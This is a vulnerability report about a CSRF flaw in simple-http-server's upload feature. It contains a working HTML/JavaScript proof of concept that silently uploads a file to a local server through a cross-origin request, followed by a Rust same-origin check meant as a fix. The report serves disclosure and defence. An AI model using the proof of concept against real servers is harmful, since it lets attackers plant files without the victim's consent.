Cross-Site Request Forgery (CSRF) in thewawar/simple-http-server

Valid

Reported on

Mar 27th 2021


✍️ Description

The 'upload' feature in simple-http-server is vulnerable to cross-site request forgery: it does not authenticate the user and simply stores whatever files are submitted to it. If uploading is enabled, an attacker can craft a web page that, when a victim interacts with it, issues a cross-site request to the simple-http-server instance, and a file is uploaded on the victim's behalf.

🕵️‍♂️ Proof of Concept

  1. Start simple-http-server with the --upload argument, which enables the upload functionality.
  2. Save the following PoC.html and open it in a browser.
  3. Click on "Submit Request".
  4. Observe that a file was uploaded: check the web root and you will see the newly uploaded file.

In this process no authentication was required, and with minimal user interaction a file can be uploaded on behalf of the victim.

<!-- PoC.html -->

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <!-- Replace the visible URL of this page with "/" -->
    <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        // Cross-origin POST to the upload endpoint; the server performs no CSRF check.
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/localhost:8000\/", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------355111547139502215671973431497");
        xhr.withCredentials = true;
        // Hand-built multipart/form-data body with a single file part named "files".
        var body = "-----------------------------355111547139502215671973431497\r\n" + 
          "Content-Disposition: form-data; name=\"files\"; filename=\"file.txt\"\r\n" + 
          "Content-Type: text/plain\r\n" + 
          "\r\n" + 
          "hello pwned\r\n\r\n" + 
          "-----------------------------355111547139502215671973431497--\r\n";
        // Copy the string into a byte array so the body is sent exactly as written.
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability allows an attacker to send requests on behalf of other users and to upload files from their browsers. This can be used to plant malware and other malicious files on the web server.
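The missing check described above is a same-origin test on the upload request. The following is an added example, not simple-http-server's own code, written in Rust because that is the project's language: a gate an upload handler could run before storing a file, using the Sec-Fetch-Site header where the browser sends it, then the Origin header (which browsers attach to every cross-origin POST, including the PoC's XHR), then Referer as a last resort. The `own_origin` value and the sample header values are assumptions.

```rust
// Added example, not simple-http-server's own code: a same-origin gate an upload
// handler could run before storing anything. `own_origin` and sample values are assumed.

/// Outcome of the gate for a state-changing (POST) request.
#[derive(Debug, PartialEq)]
pub enum Verdict {
    Allow,
    Reject(&'static str),
}

/// Case-insensitive header lookup over a (name, value) list.
fn header<'a>(headers: &'a [(&'a str, &'a str)], name: &str) -> Option<&'a str> {
    headers.iter().find(|(k, _)| k.eq_ignore_ascii_case(name)).map(|(_, v)| v.trim())
}

/// `own_origin` is the scheme://host[:port] this server is actually served on.
pub fn same_origin_verdict(headers: &[(&str, &str)], own_origin: &str) -> Verdict {
    // 1. Fetch Metadata, when the browser sends it, states the relationship directly.
    if let Some(site) = header(headers, "Sec-Fetch-Site") {
        return match site {
            "same-origin" | "none" => Verdict::Allow, // "none": typed/bookmarked navigation
            _ => Verdict::Reject("Sec-Fetch-Site is not same-origin"),
        };
    }
    // 2. Origin is sent on every cross-origin POST; a page opened from disk sends "null".
    if let Some(origin) = header(headers, "Origin") {
        return if origin.eq_ignore_ascii_case(own_origin) {
            Verdict::Allow
        } else {
            Verdict::Reject("Origin does not match this server")
        };
    }
    // 3. Fall back to Referer, and reject when it is missing too (it can be suppressed).
    let prefix = format!("{}/", own_origin.to_ascii_lowercase());
    match header(headers, "Referer") {
        Some(r) if r.to_ascii_lowercase().starts_with(prefix.as_str()) => Verdict::Allow,
        Some(_) => Verdict::Reject("Referer does not match this server"),
        None => Verdict::Reject("no Origin, Referer or Sec-Fetch-Site on a POST"),
    }
}

/// Constructed headers resembling what the cross-site XHR in PoC.html would carry.
pub fn forged_upload_headers() -> Vec<(&'static str, &'static str)> {
    vec![("Origin", "http://attacker.example"), ("Sec-Fetch-Site", "cross-site")]
}

/// Constructed headers for a form posted from the server's own upload page.
pub fn legitimate_upload_headers() -> Vec<(&'static str, &'static str)> {
    vec![("Origin", "http://localhost:8000"), ("Sec-Fetch-Site", "same-origin")]
}
```

A rejected verdict should be answered with an error status before the multipart body is parsed, so nothing is written to the web root.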
